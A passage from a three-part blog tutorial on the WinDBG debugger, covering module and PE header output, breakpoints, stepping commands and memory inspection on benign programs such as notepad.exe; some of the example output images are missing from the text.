74710000 748ae000 COMCTL32 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\COMCTL32.dll
74c80000 74c89000 VERSION C:\Windows\system32\VERSION.dll
756d0000 756dc000 CRYPTBASE C:\Windows\system32\CRYPTBASE.dll
75920000 7596a000 KERNELBASE C:\Windows\system32\KERNELBASE.dll
75a80000 75bdc000 ole32 C:\Windows\system32\ole32.dll
75be0000 75bf9000 sechost C:\Windows\SYSTEM32\sechost.dll
75c00000 75ccc000 MSCTF C:\Windows\system32\MSCTF.dll
75cd0000 75d1e000 GDI32 C:\Windows\system32\GDI32.dll
75e60000 75ee3000 CLBCatQ C:\Windows\system32\CLBCatQ.DLL
75fa0000 76069000 USER32 C:\Windows\system32\USER32.dll
76270000 762ff000 OLEAUT32 C:\Windows\system32\OLEAUT32.dll
76300000 76357000 SHLWAPI C:\Windows\system32\SHLWAPI.dll
76360000 76401000 RPCRT4 C:\Windows\system32\RPCRT4.dll
76410000 77059000 SHELL32 C:\Windows\system32\SHELL32.dll
77240000 772ec000 msvcrt C:\Windows\system32\msvcrt.dll
774b0000 7754d000 USP10 C:\Windows\system32\USP10.dll
77550000 77624000 kernel32 C:\Windows\system32\kernel32.dll
77630000 7776c000 ntdll C:\Windows\SYSTEM32\ntdll.dll
77770000 7778f000 IMM32 C:\Windows\system32\IMM32.DLL
777b0000 777ba000 LPK C:\Windows\system32\LPK.dll
777c0000 77860000 ADVAPI32 C:\Windows\system32\ADVAPI32.dll



And you can get the load address for a specific module using the "lmf m" command:

0:005> lmf m kernel32
start end module name
77550000 77624000 kernel32 C:\Windows\system32\kernel32.dll


To get the image header information you can use the !dh extension (the exclamation mark denotes an extension) on a particular module.

0:005> !dh kernel32

File Type: DLL
FILE HEADER VALUES
14C machine (i386)
4 number of sections
4A5BDAAD time date stamp Mon Jul 13 21:09:01 2009

0 file pointer to symbol table
0 number of symbols
E0 size of optional header
2102 characteristics
Executable
32 bit word machine
DLL

OPTIONAL HEADER VALUES
10B magic #
9.00 linker version
C4600 size of code
C800 size of initialized data
0 size of uninitialized data
510C5 address of entry point
1000 base of code
----- new -----
77550000 image base
1000 section alignment
200 file alignment
3 subsystem (Windows CUI)
6.01 operating system version
6.01 image version
6.01 subsystem version
D4000 size of image
800 size of headers
D5597 checksum
00040000 size of stack reserve
00001000 size of stack commit
00100000 size of heap reserve
00001000 size of heap commit
140 DLL characteristics
Dynamic base
NX compatible
B4DA8 [ A915] address [size] of Export Directory
BF6C0 [ 1F4] address [size] of Import Directory
C7000 [ 520] address [size] of Resource Directory
0 [ 0] address [size] of Exception Directory
0 [ 0] address [size] of Security Directory
C8000 [ B098] address [size] of Base Relocation Directory
C5460 [ 38] address [size] of Debug Directory
0 [ 0] address [size] of Description Directory
0 [ 0] address [size] of Special Directory
0 [ 0] address [size] of Thread Storage Directory
816B8 [ 40] address [size] of Load Configuration Directory
278 [ 408] address [size] of Bound Import Directory
1000 [ DE8] address [size] of Import Address Table Directory
0 [ 0] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory


SECTION HEADER #1
.text name
C44C1 virtual size
1000 virtual address
C4600 size of raw data
800 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
60000020 flags
Code
(no align specified)
Execute Read


Debug Directories(2)
Type Size Address Pointer
cv 25 c549c c4c9c Format: RSDS, guid, 2, kernel32.pdb
( 10) 4 c5498 c4c98

SECTION HEADER #2
.data name
FEC virtual size
C6000 virtual address
E00 size of raw data
C4E00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C0000040 flags
Initialized Data
(no align specified)
Read Write

SECTION HEADER #3
.rsrc name
520 virtual size
C7000 virtual address
600 size of raw data
C5C00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
40000040 flags
Initialized Data
(no align specified)
Read Only

SECTION HEADER #4
.reloc name
B098 virtual size
C8000 virtual address
B200 size of raw data
C6200 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
42000040 flags
Initialized Data
Discardable
(no align specified)
Read Only




Messages/Exceptions

When you attach to a process, the modules are displayed first, then WinDBG displays any applicable messages. When we attached to calc.exe, WinDBG automatically set a breakpoint (which is just a marker that tells the debugger to pause the execution of the program). So our message is:

(da8.b44): Break instruction exception - code 80000003 (first chance)


This particular message is an exception, specifically a first chance exception. An exception is basically some special condition that occurred during the program's operation. First chance means the program was paused right after the exception occurred. A second chance exception is when an exception has occurred, the program's own logic for handling the exception has already run, and the program has paused.
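
Once you've finished inspecting state, you resume the program. A minimal sketch (for the attach breakpoint above, plain g is all you need):

0:005> g

gh (go with exception handled) and gn (go with exception not handled) work the same way but tell the debugger how to report the exception back to the program; those matter more for real faults than for this break instruction.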

Registers

After the messages/exceptions, the debugger will output the state of the CPU's registers. Registers are basically special variables within the CPU that store a small amount of data or keep track of where something is in memory. The CPU can process the data in these registers very quickly, so it's faster for the CPU to perform operations on the values in its registers rather than pulling information all the way down the bus from RAM.

WinDBG automatically outputted the following registers after we attached to calc.exe:

eax=7ffd9000 ebx=00000000 ecx=00000000 edx=776cd23d esi=00000000 edi=00000000
eip=77663540 esp=02affd9c ebp=02affdc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246


Later on down the line, we can reproduce this with the r command:

0:005> r
eax=7ffd9000 ebx=00000000 ecx=00000000 edx=776cd23d esi=00000000 edi=00000000
eip=77663540 esp=02affd9c ebp=02affdc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
77663540 cc int 3



And if we want to retrieve the value of a specific register, we can do so by appending the register name:

0:005> r eax
eax=7ffd9000



or multiple registers at once:

0:005> r eax,ebp
eax=7ffd9000 ebp=02affdc8



Instruction Pointer

The final line is the next instruction to be executed. This is outputted as part of the r command and is what the EIP register points to. EIP is the instruction pointer, the register that contains the location of the next instruction for the CPU to execute. WinDBG's output is equivalent to the u eip L1 command, which basically tells WinDBG to go to the memory location pointed to by EIP, treat that memory as assembly, and print out one line.


ntdll!DbgBreakPoint:
77663540 cc int 3


Stay Tuned

In the next blog post we'll cover actually using WinDBG :) - breakpoints, stepping, and looking at memory - stay tuned!

Getting Started with WinDBG - Part 2

By Brad Antoniewicz.

This is a multipart series walking you through using WinDBG - we've gotten you off the ground with our last blog post, and now we'll focus on its core functionality so that you can start debugging programs!


  • Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
  • Part 2 - Breakpoints
  • Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

Breakpoints

Breakpoints are markers associated with a particular memory address that tell the CPU to pause the program. Because programs can contain millions of assembly instructions, manually stepping through each of those instructions would take an incredibly long time. Breakpoints speed up debugging by letting you set a marker at a specific location so the CPU can automatically execute all the code leading up to that point. Once the breakpoint is reached, the program is paused and debugging can commence.

Breakpoints can be set in software or within the CPU (hardware); let's take a look at both:

Software Breakpoints

Programs get loaded into memory and executed, which allows us to temporarily modify the memory associated with a program without affecting the actual executable on disk. This is how software breakpoints work. The debugger records the assembly instruction at the address where the breakpoint should be inserted, then silently replaces it with an INT 3 instruction (0xcc) that tells the CPU to pause execution. When the breakpoint is reached, the debugger looks at the current memory address, fetches the recorded instruction, and presents it to the user. To the user it appears that the program paused on the original instruction; the CPU, however, never knew it existed.

Software breakpoints are set within WinDBG using the bp, bm, or bu commands. bp (for Break Point) is arguably the most used breakpoint command. In its most basic use, its only argument is the address at which a breakpoint should be set:

0:001> bp 00e61018 


With bp, the address should be a memory location where executable code exists. While bp works on locations where data is stored, it can cause issues since the debugger is overwriting the data at that address. To be safe, Microsoft suggests that if you want to break on a memory location where data is stored, you should use a different breakpoint command (ba, discussed below).

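For reference, the other two software breakpoint commands operate on symbols rather than raw addresses. As a rough sketch (the kernel32 pattern is real; somedll!SomeFunction is just a made-up placeholder): bm sets a breakpoint on every symbol that matches a wildcard pattern, and bu sets an unresolved breakpoint that only becomes active once the module containing the symbol is loaded:

0:001> bm kernel32!CreateFile*
0:001> bu somedll!SomeFunction
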
Let's take a look at setting a software breakpoint by launching notepad.exe under WinDBG. By default, when a program is launched this way, WinDBG inserts a breakpoint before the program's entry point is executed and pauses there. First we'll get the location in memory where notepad.exe is loaded:



Next we'll determine the program's entry point by using !dh with the image load address:



Now we'll set a breakpoint at its entry point (load address + 0x3689):



Finally we'll tell the program to run until it encounters a breakpoint using the g command (more on this later); when the breakpoint is hit, we'll get a notice:


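Putting those steps together, the whole exchange looks roughly like this (register output trimmed); the addresses below are illustrative and yours will differ because of ASLR:

0:000> lmf m notepad
start    end        module name
00e60000 00e90000   notepad   notepad.exe
0:000> bp 00e60000 + 3689
0:000> g
Breakpoint 0 hit
notepad!WinMainCRTStartup:
00e63689 e8c5f9ffff      call    notepad!__security_init_cookie (00e63053)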

Most of your debugging will likely use software breakpoints; however, there are certain scenarios (read-only memory locations, breaking on data access, etc.) where you need to use hardware breakpoints.

Hardware Breakpoints

Within most CPUs there are special debug registers that can be used to store the addresses of breakpoints and the specific conditions on which the breakpoint should be triggered (e.g. read, write, execute). Breakpoints stored here are called hardware (or processor) breakpoints. There is only a small, fixed number of these registers (usually four), which limits the total number of hardware breakpoints that can be set. When the CPU reaches a memory address defined within a debug register and the access conditions are met, the program will pause execution.

Hardware breakpoints are set within WinDBG using the ba (Break on Access) command. In its most basic usage, it takes 3 attributes:

0:001> ba e 1 00453689 


This command would (we'll see soon why it doesn't) accomplish the same thing as the previous bp example, except now we're setting a hardware breakpoint. The first argument, e, is the type of memory access to break on (execute), the second is the size (always 1 for execute access), and the final argument is the address. Let's take a look at setting a hardware breakpoint; keep in mind our load addresses are different here because of ASLR.

Due to the way Windows resets thread contexts and the place where WinDBG breaks after spawning a process, we won't be able to set a breakpoint in the same way we did in our earlier example. Previously we set our breakpoint on the program's entry point, but if we try to do that with a hardware breakpoint we get an error:

0:000> lmf m notepad
start end module name
00e60000 00e90000 notepad notepad.exe
0:000> ba e 1 00e63689
^ Unable to set breakpoint error
The system resets thread contexts after the process
breakpoint so hardware breakpoints cannot be set.
Go to the executable's entry point and set it then.
'ba e 1 00e63689'



So in order to get around this, we'll need to use that g command and tell it to run the program until it reaches a specific memory address. This is sort of like setting a software breakpoint in behavior but isn't exactly the same. So we'll tell WinDBG to execute until we enter the program's initial thread context, which will then allow us to set hardware breakpoints.

0:000> g 00e63689
ModLoad: 76be0000 76bff000 C:\Windows\system32\IMM32.DLL
ModLoad: 76c00000 76ccc000 C:\Windows\system32\MSCTF.dll
eax=77081162 ebx=7ffd7000 ecx=00000000 edx=00e63689 esi=00000000 edi=00000000
eip=00e63689 esp=0022fbb4 ebp=0022fbbc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
notepad!WinMainCRTStartup:
00e63689 e8c5f9ffff call notepad!__security_init_cookie (00e63053)



Now we can set our hardware breakpoint:



To confirm we actually set the breakpoint in the CPU's debug registers, we can use the r command (discussed later). We'll use the M attribute to apply a register mask of 0x20:

0:000> rM 20





You'll notice something doesn't look right here: all of the registers contain 0! This is because WinDBG hasn't actually set them yet. You can single step (discussed below) with the p command. Once we do, the dr0 register will contain our breakpoint:



In this specific example, we'll probably never hit our breakpoint because it is at the program's entry point, which we've already passed. However, if our breakpoint were on a function that gets called many times over the life of the program, or on a memory address where an often-used variable is stored, we'd get a "Breakpoint Hit" message when the memory was accessed, just as we would with a software breakpoint.
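
For the data-access case, here's a sketch (the address is hypothetical): break whenever a 4-byte variable at that address is written, or whenever it is read or written:

0:000> ba w 4 00e66010
0:000> ba r 4 00e66010

With ba, r triggers on both reads and writes, and the address generally needs to be aligned to the size you specify.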

Common Commands

Now that you have the basics of setting breakpoints, there are a handful of other breakpoint related commands that will be useful. Let's look at a couple:

Viewing Set Breakpoints

To view each of the breakpoints that have been set, you can use the bl (Breakpoint List) command.

0:000> bl
0 e 00523689 e 1 0001 (0001) 0:**** notepad!WinMainCRTStartup


Here we have one breakpoint defined, the entry is broken into a few columns:
  • 0 - Breakpoint ID
  • e - Breakpoint Status - Can be enabled or disabled.
  • 00523689 - Memory Address
  • e 1 - Memory address access flags (execute) and size - For hardware breakpoints only
  • 0001 (0001) - Number of times the breakpoint is hit until it becomes active with the total passes in parentheses (this is for a special use case)
  • 0:**** - Thread and process information; here it indicates the breakpoint is not thread-specific
  • notepad!WinMainCRTStartup - The corresponding module and function offset associated with the memory address

Deleting Breakpoints

To remove a breakpoint, use the bc command:

0:000> bc 0


The only attribute to bc is the Breakpoint ID (learned from bl). Optionally you can provide * to delete all breakpoints.
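
If you'd rather keep a breakpoint around than delete it, you can toggle it instead: bd (Breakpoint Disable) and be (Breakpoint Enable) take the same Breakpoint IDs (or *) that bc does:

0:000> bd 0
0:000> be 0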

Breakpoint Tips

There are a couple of simple tips that I commonly use when setting breakpoints. Here are a few of them; please share any you have in the comments below!

Calculated Addresses

The simplest breakpoint tip is just something you'll learn when dealing with memory addresses within WinDBG: you can have WinDBG evaluate expressions to calculate addresses. For instance, in the above examples, we knew the module load address of notepad.exe and that the entry point was at offset 0x3689. Rather than calculating that address ourselves, we can have WinDBG do it for us:

0:000> lmf m notepad
start end module name
00770000 007a0000 notepad notepad.exe
0:000> bp 00770000 + 3689
0:000> bl
0 e 00773689 0001 (0001) 0:**** notepad!WinMainCRTStartup



Name and Offset Addresses

One of the great things about Symbols (covered in part 1 of this series) is that they give us the locations of known functions. So we can use the offsets to those known functions as addresses in our breakpoints. To figure out the offset, we can use the u (Unassemble) command within WinDBG. u will take a memory address, interpret the data at that memory address as assembly, and display the corresponding mnemonics. As part of its output, u will also provide the offset to the nearest symbol:

0:000> u 00770000 + 3689
notepad!WinMainCRTStartup:
00773689 e8c5f9ffff call notepad!__security_init_cookie (00773053)
0077368e 6a58 push 58h



Now we know that notepad!WinMainCRTStartup is a friendly name for 00770000 + 3689. Since there isn't a numeric offset at the end of this friendly name, we can also infer that Symbols exist for this function. Look what happens when we check out the second instruction in this function:

0:000> u 0077368e 
notepad!_initterm_e+0x61:
0077368e 6a58 push 58h



This time we got a function name, notepad!_initterm_e, plus an offset (+0x61). I'm not entirely sure why WinDBG gave the offset to notepad!_initterm_e instead of notepad!WinMainCRTStartup, probably a symbol search order thing - nonetheless, we could have used a notepad!WinMainCRTStartup offset to reference the same location:

0:000> u notepad!WinMainCRTStartup+0x5
notepad!_initterm_e+0x61:
0077368e 6a58 push 58h



The point is that now we can use this offset as a breakpoint and those offsets are always valid even if ASLR is enabled - so we don't have to waste time calculating addresses at every launch.

0:000> bp notepad!WinMainCRTStartup+0x5
0:000> bl
0 e 0077368e 0001 (0001) 0:**** notepad!_initterm_e+0x61



Breaking On Module Load

There may be some occasions when you'd like to set a breakpoint when a module is being loaded. Unfortunately, there doesn't appear to be an obvious way within the standard breakpoint commands to do this (let us know if you know of a way in the comments). Instead, a somewhat "hacky" way to do this is to have the debugger raise an exception when a particular module is loaded, using the sxe command:

0:000> sxe ld IMM32.DLL



Here we've set up a first chance exception (sxe) when a module is loaded (ld) and defined IMM32.DLL as the specific module which triggers the exception.

We can use sx (Set Exceptions) to view the configured exceptions. If we look under the Load Module list, we'll see that we have a break on IMM32.DLL.



To clear it we can use the sxi (Set Exception Ignore) command:

0:000> sxi ld IMM32.DLL


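One practical pattern, sketched below: resume with g, let the module-load exception pause the debugger, and then set an ordinary breakpoint inside the freshly loaded module before continuing (ImmGetContext is just an example export of IMM32.DLL; the ModLoad line is illustrative):

0:000> sxe ld IMM32.DLL
0:000> g
ModLoad: 76be0000 76bff000 C:\Windows\system32\IMM32.DLL
0:000> bp IMM32!ImmGetContext
0:000> g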

Executing Commands

There may be certain commands that we execute every time a breakpoint is reached. For instance, say we're always interested in what values are on the stack. We can automate this with WinDBG by building a list of commands and appending it to our breakpoint. In our example, we'll print out some information and use the dd command (discussed later) to show the stack. Notice how our command is referenced in the bl output as well:

0:000> bp notepad!WinMainCRTStartup ".echo \"Here are the values on the stack:\n\"; dd esp;"
0:000> bl
0 e 00ae3689 0001 (0001) 0:**** notepad!WinMainCRTStartup ".echo \"Here are the values on the stack:\n\"; dd esp;"



Let's see what happens when we hit our breakpoint:



As expected, the commands were executed, showing the "Here are the values on the stack" message and the stack. Commands are chained together with a semi-colon, and be sure to escape quotes within the outer-most quotes that contain the entire command. You can even append the g command to have the commands execute and the program continue automatically. This allows you to inspect the state of the program as it runs rather than manually interrupting it every time a breakpoint is hit.
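
As a quick sketch of that last point, appending g to the command list turns the breakpoint into a sort of tracepoint: every time it's hit, the message and stack are printed and the program keeps running on its own:

0:000> bp notepad!WinMainCRTStartup ".echo \"Here are the values on the stack:\n\"; dd esp; g"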

Stay Tuned

In our next blog post we'll cover inspecting memory and stepping through the program!

Getting Started with WinDBG - Part 3

By Brad Antoniewicz.

In this series of blog posts we've walked you through getting WinDBG installed and set up, and got you started by attaching to a process and setting breakpoints. Our next step is the actual debugging part: stepping through a program and looking at memory.

  • Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
  • Part 2 - Breakpoints
  • Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

Stepping

Really, the whole reason you're using a debugger is to inspect the state of a process during a specific operation or function. Just about every instruction that gets executed alters the program state in some way, which means having the ability to execute an instruction and then inspect the state is extremely important. The first part of this is "stepping" - executing instructions then pausing. WinDBG offers a number of different stepping commands depending on where you are in the program and where you want to go.

Most debuggers use the following terms that describe how you can navigate through a program and its functions:

  • Step-Into - When the instruction is a call, follow the call and pause at the first instruction in the called function.
  • Step-Over - When the instruction is a call, execute the function and all subfunctions, pausing at the instruction in the current function after the call.
  • Step-Out - Execute all instructions and pause after the current function is complete (ret at the end of the current function)

Note that both Step-Into and Step-Over execute a single instruction and pause; their behavior only differs when a call instruction is reached.

Go

The g (Go) command is more of a breakpoint command, but its functionality blurs the lines between breakpoints and stepping commands. It's used to resume execution of the program, but unlike most of the stepping commands, it's not really meant to be used on an instruction-by-instruction basis. g will resume the program until a breakpoint or exception occurs. Really, you would use g to execute all of the instructions up to a breakpoint, whereas with stepping commands you're executing instructions without setting a breakpoint. To be clear, though, debuggers will pause on a breakpoint regardless of whether you use a stepping command or something like g.

g is straightforward to use:

0:001> g


While the program is running, WinDBG will give you a message in the command input box:



If you know the address you'd like to execute until, just provide it as an argument to g:

0:001> g notepad!WinMainCRTStartup


Single Stepping

Executing a single instruction, then pausing, is called Single Stepping. This can be achieved by using either the "Step-Into" or "Step-Over" commands, since both behave the same on non-call instructions. Rather than show them both here, let's look at these commands individually.

Step-Into

0:001> t 


To Step-Into with WinDBG, use the t (Trace) command. Each step will show you the state of the registers and the next instruction to be executed. In this example we'll pause at the program's entry point (notepad!WinMainCRTStartup) and look at the first few instructions to be executed (u eip). The first instruction is a call to the notepad!__security_init_cookie function. Let's see how the debugger behaves when Stepping-Into with t:



Here we can see that we were running within notepad!WinMainCRTStartup; on the call, we used t to follow it into the notepad!__security_init_cookie function, where we paused on the first instruction.

Step-Over

0:001> p 


WinDBG uses the p command to step over a function call. This means that the call and all subinstructions within the called function will be executed and the program will pause on the next instruction within the current function (e.g. notepad!WinMainCRTStartup). Let's look at the same scenario, but this time we'll use p:



Here we can see that the instruction after the call to notepad!__security_init_cookie is push 58h. When we Step-Over with p we automatically execute everything within the notepad!__security_init_cookie function, then pause at the push after it.

Step-Out

0:001> gu 


Stepping-Out with WinDBG can be achieved with the gu (Go Up) command. This command runs the current function until its ret executes, then pauses. This is an important behavior, because if, for whatever reason, the function doesn't end in a ret or the code path taken never reaches one, you could experience unexpected results with gu. Let's see what it looks like:



Here we've paused on notepad!WinMainCRTStartup+0x1d, which is a call to notepad!_imp__GetStartupInfoA. We can see (u eip L2) that the instruction after the call is mov dword ptr [ebp-4],0FFFFFFFEh. So we'll single step (t) into the function and pause at the first instruction. Now we use gu to execute all instructions and function calls in the child function, then pause on the next instruction in the parent function, which is our mov dword ptr [ebp-4],0FFFFFFFEh.
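
Condensed into commands (output trimmed), that whole sequence is simply u eip L2 to confirm the call and the mov that follows it, t to step into the call, and gu to run back out to that mov:

0:000> u eip L2
0:000> t
0:000> gu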

Executing until Return

gu is good and all, but sometimes you want to look at the stack right before the function returns; in this scenario, you'll need to use either tt (Trace to Next Return) or pt (Step to Next Return). Both are easy to call:

0:001> tt 


0:001> pt 


The important thing to remember here is that tt will stop at the next return, even if it's not in the current function. For instance, consider the following pseudocode; our goal is to pause on the ret in func:


func:
call somefunc
ret

somefunc:
call someotherfunc
ret

someotherfunc:
ret


In this example, if we pause at call somefunc, then use tt, we'll end up pausing at the ret in someotherfunc.

A better approach for this scenario might be to use pt: Using the same pseudocode, if we pause at call somefunc, then use pt, we'd execute all the code in somefunc (and subsequently someotherfunc), then pause at the ret in func. In all reality for this example we could just use p, but that doesn't illustrate the point :)

Ultimately it depends on what you, as the person using the debugger, want to do.

Inspecting Memory

Now we can finally get into the most important part of debugging: Inspecting Memory. WinDBG provides the d (Display Memory) command for this purpose. In its most simple form you can run it like this:

0:001> d


But this is more or less useless. Running d by itself for the first time will output the memory that eip points to. This is useless because eip should be pointing to a code segment and, to make sense of that, you'd really need to use the u (Unassemble) command. So a much better command to start with would be:

0:001> d esp


This will show us the values on the stack. With d, WinDBG will display data using the format specified by the last d command executed. If this is your first time running d, there is no previous command stored, so WinDBG will give you the output of the db (Display Byte) command.

Display Bytes

db will output the data in bytes and provide the corresponding ASCII values:


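The layout is three columns: the address, sixteen bytes of hex (split 8-and-8 by a dash), and the ASCII rendering of those bytes. The values in this one-line sketch are invented purely to show the format:

0:001> db esp L10
0022fbb4  8e 36 77 00 f0 c1 1f 00-00 00 00 00 41 41 41 41  .6w.........AAAA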

Display Words

Words, or 2 byte values, can be shown with dw (Display Word). Alternatively, you can use dW to show Words and ASCII values:



Display DWORDs

My favorite memory viewing command is dd (Display DWORDs). A DWORD is a double word, so 4 bytes. dd will just show you the DWORDs, while dc will show DWORDs and ASCII values:



Display Quadwords

To display quadwords (4 words/8 bytes) within WinDBG, use dq:



Display Bits

You can even show binary with dyb:



Displaying Strings

Strings are displayed with da; essentially, WinDBG will print everything as ASCII until it reaches a null byte. So here, even though the data at esp isn't a string, it'll be treated as one until a null is reached. Just to further illustrate this, I've printed out the 5 bytes at esp with db esp L5:



Addressing

So far we've just been looking at the memory that esp points to by using esp as the parameter to our memory inspection commands; however, there are a number of different ways to reference memory that can be useful when starting out.

Registers - As we've seen, you can use any register and WinDBG will use the address in that register as the memory address:

0:001> dd eax


Memory Address - You can also just use the memory address itself by providing it:

0:001> db 0020faa0  


Offsets - You can also use offsets with registers or memory addresses by using mathematical expressions:

0:001> db 0020faa0 + 18


0:001> dd ebp - 18


0:001> dq ebp*eax


These expressions can be used wherever an address can be used. Here's what it looks like in WinDBG:



WinDBG will output question marks (?) for invalid/free memory.

Pointers

There are often times where a value on the stack is just a pointer to another location. If you'd like to look at the data it points to, you'd need to do two lookups. For instance, say we know that the value at ebp+4 is a pointer to some assembly code that we want to read. To view that assembly, we'd need two commands. The first command shows us the value stored at ebp+4:



0:001> dd ebp+4


Then the second requires us to manually copy that value and paste it in as an argument to the u command so we can view the assembly:

0:001> u 777be2d1




This is all fine, but there's an easier way with the poi() function. Using poi() we just provide ebp+4 as its parameter and it will automatically take the value at that address and use it, rather than just using the address ebp+4 itself:

0:001> u poi(ebp+4)




Limiting output

By default WinDBG will output a set amount of data; however, we can limit how much of that data is output with the L (Size Range Specifier) attribute. L works with most display commands and just needs to be appended to the end with a value:

0:001> dd esp L1


The number specified with L is the size, which is relative to the command executed. For instance, with db, L will mean the number of bytes to print, while with dd, L will mean the number of DWORDs.

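To make the unit difference concrete, both of these use L4, but the first prints four bytes while the second prints four DWORDs (sixteen bytes):

0:001> db esp L4
0:001> dd esp L4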


That's really it to get you off the ground inspecting memory - I know, three blog posts building up to this functionality, and it's just this tiny little section? Yup - there are some more memory inspection commands, but to get started, d is the core command. Check out the tips below for more info.

Tips and Tricks

Now that you're off the ground, lets look at some handy tricks and tips that can make your debugging experience much better.

Keyboard Shortcuts

Chances are you'll be starting and stopping an application hundreds of times while you're debugging, so any little shortcut can save you tons of time in the long run. Keyboard shortcuts are huge; here are the four I use the most:

  • F6 - Attach to a process. With the Attach Window open, use the "End" key to drop down to the bottom (where newly launched applications are).
  • CTRL + E - Open Executable
  • CTRL + Break - "Break" into a running application - used to pause a running program
  • F5 - Shortcut for g

Converting Formats

If you haven't figured this out already, WinDBG prints numbers in hex by default. That means a 12 in WinDBG's output isn't the same as decimal 12. One quick tip is the .formats command, which is straightforward to use:

0:001> .formats value


Where value is something you want to convert. So .formats will take whatever you provide and output it in a variety of formats:

Now we know hex 12 is actually decimal 18 :). However, you can also provide decimal values using the 0n specifier:


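As a sketch, compare the two: the first interprets 12 as hex (decimal 18), while the 0n prefix forces it to be read as decimal 12. Each command prints the value as hex, decimal, octal, binary, characters, and a few other representations:

0:001> .formats 12
0:001> .formats 0n12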

Math

There may be times where you need to calculate an offset or just do some basic math. WinDBG will evaluate expressions with the ? command:

0:001> ?1+1


These expressions can be as simple or as complicated as you'd like and can contain all of the standard addressing that WinDBG uses:


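For example, evaluating the entry point address we calculated earlier by hand (the module base is illustrative); ? replies with the result in both decimal and hex:

0:001> ? 00770000 + 3689
Evaluate expression: 7812745 = 00773689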

...who needs calc.exe when you have WinDBG!

Extensions

To make life easier, there are a number of extensions that people have created for WinDBG. These are great little tools that can be used within the debugger to provide extra functionality. Some are even built by Microsoft. Some of the most useful ones are !heap, !address, !dh, and !peb. I'll cover these and more in another blog post - so stay tuned!

Cheat Sheets

There are a couple of really nice WinDBG command references, cheat sheets, and tutorials out there if you don't like .hh; here are a couple of good ones:

Got any more tips or tricks? Share them in the comments below!
